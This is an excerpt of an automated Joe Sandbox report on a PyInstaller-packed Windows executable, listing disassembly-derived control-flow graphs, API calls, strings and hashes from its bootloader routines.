                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69299697C), ref: 00007FF692996763
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                    • API String ID: 1458651798-239921721
                                                                                                    • Opcode ID: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
                                                                                                    • Instruction ID: 3c09102e5ecb2791ac2cba0f2a9b60d9611bcffbe54c9590ea7ab2e956fda0d4
                                                                                                    • Opcode Fuzzy Hash: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
                                                                                                    • Instruction Fuzzy Hash: 64D19E2AE082528AFB34AF27D8901B96761EF44BECF444175EA4DC7687DEBCE461C740

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 444 7ff6929973bc-7ff69299742f call 7ff6929970f0 447 7ff692997431-7ff69299743a call 7ff6929855a4 444->447 448 7ff692997449-7ff692997453 call 7ff692988534 444->448 453 7ff69299743d-7ff692997444 call 7ff6929855c4 447->453 454 7ff69299746e-7ff6929974d7 CreateFileW 448->454 455 7ff692997455-7ff69299746c call 7ff6929855a4 call 7ff6929855c4 448->455 468 7ff69299778a-7ff6929977aa 453->468 456 7ff692997554-7ff69299755f GetFileType 454->456 457 7ff6929974d9-7ff6929974df 454->457 455->453 463 7ff692997561-7ff69299759c GetLastError call 7ff692985538 CloseHandle 456->463 464 7ff6929975b2-7ff6929975b9 456->464 460 7ff692997521-7ff69299754f GetLastError call 7ff692985538 457->460 461 7ff6929974e1-7ff6929974e5 457->461 460->453 461->460 466 7ff6929974e7-7ff69299751f CreateFileW 461->466 463->453 479 7ff6929975a2-7ff6929975ad call 7ff6929855c4 463->479 471 7ff6929975c1-7ff6929975c4 464->471 472 7ff6929975bb-7ff6929975bf 464->472 466->456 466->460 473 7ff6929975c6 471->473 474 7ff6929975ca-7ff69299761f call 7ff69298844c 471->474 472->474 473->474 482 7ff69299763e-7ff69299766f call 7ff692996e70 474->482 483 7ff692997621-7ff69299762d call 7ff6929972f8 474->483 479->453 490 7ff692997671-7ff692997673 482->490 491 7ff692997675-7ff6929976b7 482->491 483->482 489 7ff69299762f 483->489 494 7ff692997631-7ff692997639 call 7ff69298b184 489->494 490->494 492 7ff6929976d9-7ff6929976e4 491->492 493 7ff6929976b9-7ff6929976bd 491->493 496 7ff692997788 492->496 497 7ff6929976ea-7ff6929976ee 492->497 493->492 495 7ff6929976bf-7ff6929976d4 493->495 494->468 495->492 496->468 497->496 499 7ff6929976f4-7ff692997739 CloseHandle CreateFileW 497->499 501 7ff69299776e-7ff692997783 499->501 502 7ff69299773b-7ff692997769 GetLastError call 7ff692985538 call 7ff692988674 499->502 501->496 502->501
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617910340-0
                                                                                                    • Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                                    • Instruction ID: c8ce3fda67743c4d2654c893dbd824484336fe5fae65bcf5b3d798a62489f688
                                                                                                    • Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
                                                                                                    • Instruction Fuzzy Hash: 35C1D376B28A4189FB60CF66C4916AC3771FB49BACB050275DA1E9B3D6CF78D465C300

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF69297154F), ref: 00007FF6929779F7
                                                                                                      • Part of subcall function 00007FF692977B70: GetEnvironmentVariableW.KERNEL32(00007FF692973A1F), ref: 00007FF692977BAA
                                                                                                      • Part of subcall function 00007FF692977B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF692977BC7
                                                                                                      • Part of subcall function 00007FF692987EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF692987F05
                                                                                                    • SetEnvironmentVariableW.KERNEL32 ref: 00007FF692977AB1
                                                                                                      • Part of subcall function 00007FF692972B30: MessageBoxW.USER32 ref: 00007FF692972C05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                    • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                    • API String ID: 3752271684-1116378104
                                                                                                    • Opcode ID: 5ba17ae65ebc39be6e5ecc80ca7826a35a7ea09f79554ee3d64871af99c4e77d
                                                                                                    • Instruction ID: b0f2ce0f7f79e611321ee850fcf5cfa08affcbfe2a0ea473a40c33647a2f6d70
                                                                                                    • Opcode Fuzzy Hash: 5ba17ae65ebc39be6e5ecc80ca7826a35a7ea09f79554ee3d64871af99c4e77d
                                                                                                    • Instruction Fuzzy Hash: 9C519F11B0D21345FE74BB27A9212FA5395EF89BC8F4840B5ED0ECB7A7EDADE5018240

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock$Message
                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                    • API String ID: 677216364-1384898525
                                                                                                    • Opcode ID: 47e4eafb180ea2df6a33b469e97ba65bab2619a214ea88dc4ada9b8af2080f8c
                                                                                                    • Instruction ID: ba599ee26c712fabd4cee11f2ca33767d842742b6faa3f0999cac89b4696b14c
                                                                                                    • Opcode Fuzzy Hash: 47e4eafb180ea2df6a33b469e97ba65bab2619a214ea88dc4ada9b8af2080f8c
                                                                                                    • Instruction Fuzzy Hash: 7B519071A196028AFB34DF2AE45017833A4EF88B9CB554175DA4DC779BDEBCE440C744

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 266 7ff692971000-7ff6929739d6 call 7ff692980060 call 7ff692980058 call 7ff6929787b0 call 7ff692980058 call 7ff69297bd60 call 7ff6929853f0 call 7ff692985ff8 call 7ff692971eb0 284 7ff6929739dc-7ff6929739ec call 7ff692973ed0 266->284 285 7ff692973b7f 266->285 284->285 290 7ff6929739f2-7ff692973a05 call 7ff692973da0 284->290 286 7ff692973b84-7ff692973ba4 call 7ff69297bdc0 285->286 290->285 294 7ff692973a0b-7ff692973a32 call 7ff692977b70 290->294 297 7ff692973a74-7ff692973a9c call 7ff692978050 call 7ff692971cb0 294->297 298 7ff692973a34-7ff692973a43 call 7ff692977b70 294->298 308 7ff692973b4d-7ff692973b5e 297->308 309 7ff692973aa2-7ff692973ab8 call 7ff692971cb0 297->309 298->297 304 7ff692973a45-7ff692973a4b 298->304 306 7ff692973a4d-7ff692973a55 304->306 307 7ff692973a57-7ff692973a71 call 7ff69298507c call 7ff692978050 304->307 306->307 307->297 312 7ff692973bb2-7ff692973bb5 308->312 313 7ff692973b60-7ff692973b67 308->313 320 7ff692973aba-7ff692973ad2 call 7ff692972b30 309->320 321 7ff692973ad7-7ff692973ada 309->321 316 7ff692973bcb-7ff692973be3 call 7ff692978be0 312->316 317 7ff692973bb7-7ff692973bbd 312->317 313->312 318 7ff692973b69-7ff692973b71 call 7ff692978980 313->318 335 7ff692973be5-7ff692973bec 316->335 336 7ff692973bee-7ff692973bf5 SetDllDirectoryW 316->336 322 7ff692973bfb-7ff692973c08 call 7ff692976df0 317->322 323 7ff692973bbf-7ff692973bc9 317->323 337 7ff692973ba5-7ff692973ba8 call 7ff6929714f0 318->337 338 7ff692973b73 318->338 320->285 321->308 329 7ff692973adc-7ff692973af3 call 7ff692973fe0 321->329 339 7ff692973c0a-7ff692973c17 call 7ff692976aa0 322->339 340 7ff692973c53-7ff692973c58 call 7ff692976d70 322->340 323->316 323->322 348 7ff692973afa-7ff692973b26 call 7ff6929782c0 329->348 349 7ff692973af5-7ff692973af8 329->349 343 7ff692973b7a call 7ff692972b30 335->343 336->322 347 7ff692973bad-7ff692973bb0 337->347 338->343 339->340 357 7ff692973c19-7ff692973c28 call 7ff692976600 339->357 352 7ff692973c5d-7ff692973c60 340->352 343->285 347->285 347->312 348->308 359 7ff692973b28-7ff692973b30 call 7ff69298028c 348->359 350 7ff692973b35-7ff692973b4b call 7ff692972b30 349->350 350->285 355 7ff692973d06-7ff692973d15 call 7ff6929734c0 352->355 356 7ff692973c66-7ff692973c70 352->356 355->285 374 7ff692973d1b-7ff692973d74 call 7ff692978950 call 7ff692977fe0 call 7ff692977b70 call 7ff692973620 call 7ff692978090 call 7ff692976850 call 7ff692976d70 355->374 360 7ff692973c73-7ff692973c7d 356->360 372 7ff692973c2a-7ff692973c36 call 7ff692976580 357->372 373 7ff692973c49-7ff692973c4e call 7ff692976850 357->373 359->350 365 7ff692973c86-7ff692973c88 360->365 366 7ff692973c7f-7ff692973c84 360->366 370 7ff692973c8a-7ff692973cad call 7ff692971ef0 365->370 371 7ff692973cd1-7ff692973d01 call 7ff692973620 call 7ff692973460 call 7ff692973610 call 7ff692976850 call 7ff692976d70 365->371 366->360 366->365 370->285 385 7ff692973cb3-7ff692973cbd 370->385 371->286 372->373 386 7ff692973c38-7ff692973c47 call 7ff692976c40 372->386 373->340 409 7ff692973d76-7ff692973d7d call 7ff692977d50 374->409 410 7ff692973d82-7ff692973d85 call 7ff692971e80 374->410 389 7ff692973cc0-7ff692973ccf 385->389 386->352 389->371 389->389 409->410 413 7ff692973d8a-7ff692973d8c 410->413 413->286
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF692973ED0: GetModuleFileNameW.KERNEL32(?,00007FF6929739EA), ref: 00007FF692973F01
                                                                                                    • SetDllDirectoryW.KERNEL32 ref: 00007FF692973BF5
                                                                                                      • Part of subcall function 00007FF692977B70: GetEnvironmentVariableW.KERNEL32(00007FF692973A1F), ref: 00007FF692977BAA
                                                                                                      • Part of subcall function 00007FF692977B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF692977BC7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                    • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                    • API String ID: 2344891160-1544818733
                                                                                                    • Opcode ID: 7cc65c86756cc808ec1b0249ed19e691a9caed38d8dfd1ef2e97b3f8d7c16418
                                                                                                    • Instruction ID: ed8a82d09b621fc6ab0d4975a696e5216f1a96f2bc650baed48233d0aa6929c3
                                                                                                    • Opcode Fuzzy Hash: 7cc65c86756cc808ec1b0249ed19e691a9caed38d8dfd1ef2e97b3f8d7c16418
                                                                                                    • Instruction Fuzzy Hash: 83B17021A1D64341FA74EB2394512FD6398FF84B8CF4401B6EA4DC7697EFACE6058744

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF69298F66A,?,?,-00000018,00007FF69298B417,?,?,?,00007FF69298B30E,?,?,?,00007FF692986552), ref: 00007FF69298F44C
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF69298F66A,?,?,-00000018,00007FF69298B417,?,?,?,00007FF69298B30E,?,?,?,00007FF692986552), ref: 00007FF69298F458
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3013587201-537541572
                                                                                                    • Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                                    • Instruction ID: 3f56950757528560ee7283d574962439a046f486dd2c285445f67a6169cc7750
                                                                                                    • Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
                                                                                                    • Instruction Fuzzy Hash: 63410321B19B1241FA36DB17A8045BA2391FF4ABE8F8C5176DD0DD7786DEBCE4498310

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF692978660: GetCurrentProcess.KERNEL32 ref: 00007FF692978680
                                                                                                      • Part of subcall function 00007FF692978660: OpenProcessToken.ADVAPI32 ref: 00007FF692978691
                                                                                                      • Part of subcall function 00007FF692978660: GetTokenInformation.KERNELBASE ref: 00007FF6929786B6
                                                                                                      • Part of subcall function 00007FF692978660: GetLastError.KERNEL32 ref: 00007FF6929786C0
                                                                                                      • Part of subcall function 00007FF692978660: GetTokenInformation.KERNELBASE ref: 00007FF692978700
                                                                                                      • Part of subcall function 00007FF692978660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69297871C
                                                                                                      • Part of subcall function 00007FF692978660: CloseHandle.KERNEL32 ref: 00007FF692978734
                                                                                                    • LocalFree.KERNEL32(00000000,00007FF692973B6E), ref: 00007FF692978A0C
                                                                                                    • LocalFree.KERNEL32 ref: 00007FF692978A15
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                    • API String ID: 6828938-1817031585
                                                                                                    • Opcode ID: 3836f67131116870ca23a087b2c6671b35fb3b3af5dea2168533cc0de3b13045
                                                                                                    • Instruction ID: 5ea705e96fa624f89448cf859bd577981de652c39a45df21665ab683b0844a49
                                                                                                    • Opcode Fuzzy Hash: 3836f67131116870ca23a087b2c6671b35fb3b3af5dea2168533cc0de3b13045
                                                                                                    • Instruction Fuzzy Hash: 2C21C231A1878685F630EB22E8556F92369FF54798F4401B1E94EC3797DFBCE5048380
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 1452418845-0
                                                                                                    • Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                                                    • Instruction ID: 274e7e4dfea8e17f1307ffeda4186f82c1b6161c2999d4cd76b417e2df38107a
                                                                                                    • Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                                                    • Instruction Fuzzy Hash: 5E313B21E0D54385FA34ABA794623B92399EF61B4CF4450B5EA0EDB2E7DEECF404C211
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279662727-0
                                                                                                    • Opcode ID: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
                                                                                                    • Instruction ID: 30d134f441cda43d3a4b6c40ef4d73ba588fd47dc3e50494ce1191927b56ff58
                                                                                                    • Opcode Fuzzy Hash: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
                                                                                                    • Instruction Fuzzy Hash: F241A222D1878283F7609B22D5103B96370FF94768F159375EA9C8BAD2DFACA5E48700
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryMessage
                                                                                                    • String ID: Security descriptor is not initialized!
                                                                                                    • API String ID: 73271072-986317556
                                                                                                    • Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                                                    • Instruction ID: e5df6af879073b052122ec4c52350eca8f05c32be291a09b4c40bff1e3d9b067
                                                                                                    • Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                                                    • Instruction Fuzzy Hash: 53E092B1E187068AFA30AB16E8452692390FB55768F8013B4E15DC73E5EFBCD1198B40
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
                                                                                                    • Instruction ID: 4f63ab4bc4ca3b28aea4fae7955c67aed2c6adf3426208a3b84dc97c4da598a8
                                                                                                    • Opcode Fuzzy Hash: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
                                                                                                    • Instruction Fuzzy Hash: 9551C261B0A28286FA389B37940067A67D1FF84BACF1C4675DD6D877C7DEBCE4018610
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF69298B099,?,?,00000000,00007FF69298B14E), ref: 00007FF69298B28A
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF69298B099,?,?,00000000,00007FF69298B14E), ref: 00007FF69298B294
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 1687624791-0
                                                                                                    • Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                                                    • Instruction ID: 27a3dac50121d40140d21d8ef8956da95d08e75757e3ef27da8ab1e4ee1c8ff3
                                                                                                    • Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                                                    • Instruction Fuzzy Hash: 2C21C320B1868601FAB097A3946527D1392EF947E8F4C42B9DA2FC77D7DEECE4458302
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
